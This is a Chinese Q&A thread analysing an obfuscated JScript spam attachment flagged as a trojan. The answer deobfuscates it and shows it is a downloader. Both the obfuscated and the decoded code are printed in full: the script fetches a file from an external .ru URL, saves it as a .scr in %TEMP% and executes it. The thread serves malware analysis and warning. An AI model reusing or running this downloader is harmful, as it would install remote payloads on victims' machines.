这个javascript有什么作用?这被ESET标记为特洛伊木马

时间:2016-02-22 19:51:22

标签: javascript deobfuscation trojan

我收到一封垃圾邮件,其中包含一个带有.js文件的附件,出于好奇,我在记事本中打开了它(当然没有运行它)。不得不暂时禁用ESET,因为它将此标记为木马。我想知道这实际上是做什么的:

 autonomousRadio = eval(('transport', 'caste', 'acoustic', 'primitive', 'absurd', 'clip', '\u0074phenomenon'.e()) + 'h' + ('station', '\u0069program(me)'.e()) + 's');
 autonomousRadio = autonomousRadio[('barbarian', '\u0041ruin'.e()) + 'ct' + ('state', 'prologue', 'accompany', 'orientation', 'chance', 'unison', '\u0069cyclone'.e()) + 've' + ('modify', 'instruction', 'perspective', '\u0058depot'.e()) + 'O' + ('intellect', 'guide', 'delegation', 'invalid', '\u0062order'.e()) + 'je' + ('pill', 'revue', 'compress', 'commerce', '\u0063sponsor'.e()) + 't'];
 skeletonArcade = ('major', '\u0052discrete'.e()) + 'un';

 function String.prototype.e(a) {
     return this.charAt(a);
 }
 phaseMemorial = new autonomousRadio(('dogma', 'literature', '\u0057handicap'.e()) + 'S' + ('beach', 'reform', 'duplicate', 'obligation', 'gram(me)', '\u0063origin'.e()) + 'ri' + ('aspect', 'finish', 'cycle', 'military', 'universal', 'citation', '\u0070association'.e()) + 't.' + ('document', 'solo', 'simulate', 'potentiality', 'statue', 'episode', '\u0053vacancy'.e()) + 'he' + ('detail', 'contact', 'triumph', 'nose', '\u006caccord'.e()) + 'l');
 tribuneApparatus = phaseMemorial[('emotion', 'practice', '\u0045pseudonym'.e()) + 'xp' + ('project', 'acoustic', 'absolute', 'version', '\u0061morphology'.e()) + 'nd' + ('permanent', 'occupy', '\u0045cabin'.e()) + 'nv' + ('voyage', 'park', 'dialect', '\u0069emission'.e()) + 'ro' + ('superman', '\u006esubstance'.e()) + 'm' + ('intelligence', 'disk', 'tick', 'rocket', 'perspective', 'opposite', '\u0065match'.e()) + 'nt' + ('communication', 'order', '\u0053computer'.e()) + 't' + ('collection', '\u0072gallery'.e()) + 'in' + ('method', 'regent', 'communication', 'memoirs', 'forum', '\u0067mechanic'.e()) + 's'](('natural', 'refrigerator', 'stadium', 'station', 'opposite', 'double', '\u0025captain'.e()) + 'TE' + ('scandal', '\u004dblock'.e()) + 'P%' + ('focus', 'start', 'zone', '\u002forientation'.e()) + '') + "XFxuhJaJ" + ('selective', '\u002einformer'.e()) + 'sc' + ('vocal', 'public', 'speculation', 'mechanic', '\u0072balance'.e()) + '';
 classificationHospital = new autonomousRadio(('aspect', 'tract', 'bottle', '\u004dthermometer'.e()) + 'SX' + ('container', 'universe', 'decoration', 'file', 'resolution', '\u004dhotel'.e()) + 'L2' + ('resistor', 'square', '\u002ecensor'.e()) + 'X' + ('examination', 'collect', 'formation', 'distant', 'sexual', 'filter', '\u004dalternative'.e()) + 'LH' + ('bomber', 'amplitude', 'declaration', 'collector', 'veto', 'illegal', '\u0054boss'.e()) + 'TP');
 classificationHospital[('globe', '\u006fregent'.e()) + 'p' + ('metaphor', 'spindle', 'record', 'protector', 'patrol', '\u0065order'.e()) + 'n'](('medicine', '\u0047conception'.e()) + 'E' + ('modal', 'aquarium', 'cube', 'ocean', 'radical', 'bureau', '\u0054qualification'.e()) + '', ('tradition', 'regular', 'specification', '\u0068attestation'.e()) + 'tt' + ('investment', '\u0070directive'.e()) + ':' + ('solo', 'dialogue', '\u002fvacuum'.e()) + '/m' + ('nose', 'inspection', 'translator', 'balloon', 'problem', 'censor', '\u006fabsurd'.e()) + 'n' + ('cyclone', 'simulate', '\u0064university'.e()) + 'e' + ('reflection', 'sphere', 'manager', 'mark', '\u0072printer'.e()) + 'o.' + ('produce', '\u0072arbiter'.e()) + 'u' + ('deposit', '\u002fcooperation'.e()) + 's' + ('regularity', 'flag', '\u0079solo'.e()) + 's' + ('translation', 'technology', '\u0074literature'.e()) + 'em' + ('radical', '\u002fcomment'.e()) + 'lo' + ('photograph', 'moral', 'instance', 'limit', 'arctic', '\u0067unison'.e()) + 's' + ('administration', 'subjective', 'prologue', 'globe', '\u002fadequate'.e()) + '5' + ('interval', 'criteria', 'false', 'skeleton', '\u0036balloon'.e()) + 'y4' + ('anonymous', '\u0067licence'.e()) + '45' + ('plus', '\u0067game'.e()) + 'h' + ('audience', 'story', 'cocoon', 'minimal', '\u0034firm'.e()) + '5' + ('modal', 'test', 'mile', 'indifferent', '\u0068period'.e()) + '', ((1 & 1) + (1 * 0)) == ((1 | 1) & (0 & 1)));
 classificationHospital[('permanent', 'megaphone', 'tick', '\u0073syntax'.e()) + 'en' + ('academic', 'interpret', 'test', 'arbiter', 'trilogy', '\u0064negative'.e()) + '']();
 while (classificationHospital[('transportation', 'dialogue', 'control', 'amphibian', '\u0072cardinal'.e()) + 'e' + ('metal', 'radical', 'balance', 'author', '\u0061portal'.e()) + 'dy' + ('diagram', 'numeral', 'visa', 'tick', '\u0073band'.e()) + 'ta' + ('yard', 'primitive', 'special', 'intellect', 'original', 'tablet', '\u0074illustrate'.e()) + 'e'] < ((2 ^ 1) ^ (1 | 6))) {
     this[('administration', 'bomber', 'culture', 'delegate', 'centre', 'individuality', '\u0057recipe'.e()) + 'Sc' + ('laboratory', 'storm', 'archive', 'board', 'mate', 'occupy', '\u0072impression'.e()) + 'i' + ('filter', 'cocoon', 'linguist', 'clan', '\u0070cooperation'.e()) + 't'][('practical', '\u0053robot'.e()) + 'le' + ('variation', '\u0065technique'.e()) + 'p'](((3384 / 36) + (5 + 1)));
 }
 commandOccupy = new autonomousRadio(('censor', '\u0041guide'.e()) + 'D' + ('boxing', 'artillery', 'ocean', 'passion', '\u004ftransform'.e()) + 'DB' + ('intelligence', 'conception', 'cipher', 'motif', 'secret', '\u002emoment'.e()) + 'St' + ('refrigerator', 'vacuum', '\u0072lexicon'.e()) + 'ea' + ('delegation', 'rank', 'radiation', 'cortege', '\u006dplatform'.e()) + '');
 try {
     commandOccupy[('sexual', 'context', 'present', '\u006finfection'.e()) + 'p' + ('aggregate', 'action', 'prize', 'pretension', 'resource', '\u0065cabinet'.e()) + 'n']();
     commandOccupy[('provocation', 'rational', 'memoirs', 'limit', 'amputate', 'department', '\u0074interpretation'.e()) + 'yp' + ('bandit', '\u0065section'.e()) + ''] = ((0 / 16) ^ (52 - 51));
     commandOccupy[('assistant', 'inversion', 'prize', 'injection', 'dictator', 'transcription', '\u0077bisexual'.e()) + 'ri' + ('student', 'reserve', 'figure', '\u0074net'.e()) + 'e'](classificationHospital[('radiation', '\u0052generation'.e()) + 'e' + ('bazaar', 'popular', 'translation', '\u0073captain'.e()) + 'po' + ('profile', 'active', 'medicine', '\u006emate'.e()) + 'se' + ('operate', 'document', 'arctic', '\u0042analogy'.e()) + 'od' + ('cathedral', '\u0079factor'.e()) + '']);
     commandOccupy[('block', '\u0070project'.e()) + 'os' + ('square', 'filter', 'vertical', 'variant', '\u0069selection'.e()) + 't' + ('relaxation', 'decade', 'negative', 'cent', '\u0069variant'.e()) + 'on'] = ((0 & 1) & (1 | 0));
     try {
         commandOccupy[('literature', 'industrial', 'assortment', 'autograph', 'refrigerator', '\u0073boss'.e()) + 'a' + ('buffer', 'dog', 'public', '\u0076lord'.e()) + 'e' + ('collect', 'abstract', 'initiative', 'arctic', 'focus', 'incident', '\u0054amortization'.e()) + 'o' + ('precedent', 'transport', 'scandal', 'confidential', '\u0046block'.e()) + 'il' + ('solo', 'delta', 'defect', 'terminology', 'fortune', 'agent', '\u0065arbiter'.e()) + ''](tribuneApparatus, ((2 ^ 0) | (0 + 0)));
         commandOccupy[('collective', 'shorts', 'bazaar', '\u0063project'.e()) + 'l' + ('terminology', 'collective', 'indifferent', 'veto', 'numeration', 'statuette', '\u006factor'.e()) + 'se']();
         phaseMemorial[skeletonArcade](tribuneApparatus);
     } catch (arbiterApproximation) {};
 } catch (arbiterApproximation) {};

如果有人能够简短地看一下并解释这应该做什么,我将不胜感激!

由于

1 个答案:

答案 0 :(得分:9)

有趣的混淆,大量使用comma operator。注意

function String.prototype.e(a) {
    return this.charAt(a);
}

在语法上是无效的JavaScript,但适用于Jscript(可能只是旧版本)(参见here, page 69)。那些.e()调用只获取相应字符串的第一个字符。

使用代码段删除混淆

code.replace(/\\u([0-9a-f]{4})/g, function(_, c) { return String.fromCharCode(parseInt(c, 16)); })
  .replace(/\((?:'[^']*',\s*)*'(.)[^']*'\.e\(\)\)/g, "'$1'")
  .replace(/'\s*\+\s*'/g, "")

这是你会得到的(不要运行这个!):

autonomousRadio = eval('this');
autonomousRadio = autonomousRadio['ActiveXObject'];
skeletonArcade = 'Run';
phaseMemorial = new autonomousRadio('WScript.Shell');
tribuneApparatus = phaseMemorial['ExpandEnvironmentStrings']('%TEMP%/') + "XFxuhJaJ" + '.scr';
classificationHospital = new autonomousRadio('MSXML2.XMLHTTP');
classificationHospital['open']('GET', 'http://mondero.ru/system/logs/56y4g45gh45h', ((1 & 1) + (1 * 0)) == ((1 | 1) & (0 & 1)));
classificationHospital['send']();
while (classificationHospital['readystate'] < ((2 ^ 1) ^ (1 | 6))) {
    this['WScript']['Sleep'](((3384 / 36) + (5 + 1)));
}
commandOccupy = new autonomousRadio('ADODB.Stream');
try {
    commandOccupy['open']();
    commandOccupy['type'] = ((0 / 16) ^ (52 - 51));
    commandOccupy['write'](classificationHospital['ResponseBody']);
    commandOccupy['position'] = ((0 & 1) & (1 | 0));
    try {
        commandOccupy['saveToFile'](tribuneApparatus, ((2 ^ 0) | (0 + 0)));
        commandOccupy['close']();
        phaseMemorial[skeletonArcade](tribuneApparatus);
    } catch (arbiterApproximation) {};
} catch (arbiterApproximation) {};

是的,显然是特洛伊木马,从该俄罗斯域名下载.scr file到您的计算机上。